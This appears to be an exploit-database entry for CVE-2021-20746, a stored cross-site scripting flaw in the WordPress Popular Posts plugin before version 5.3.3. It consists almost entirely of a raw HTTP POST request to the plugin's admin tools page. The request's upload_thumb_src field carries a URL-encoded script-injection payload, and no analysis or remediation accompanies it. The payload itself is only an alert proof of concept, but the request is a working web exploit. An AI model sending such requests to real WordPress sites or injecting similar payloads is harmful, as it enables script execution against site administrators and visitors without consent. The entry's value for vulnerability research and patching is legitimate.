Exploit for WordPress Popular Posts < 5.3.3 - Authenticated Stored Cross-Site Scripting (XSS) CVE-2021-20746

## https://sploitus.com/exploit?id=WPEX-ID:86CC93C1-DAF5-43E7-8AFB-66362D784CE9
POST /wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

upload_thumb_src=%22%3e%3cscript%3ealert(%2fXSS%2f)%3c%2fscript%3e&thumb_source=featured&thumb_lazy_load=1&thumb_field=&thumb_field_resize=0&section=thumb&wpp-admin-token=69e258f2d7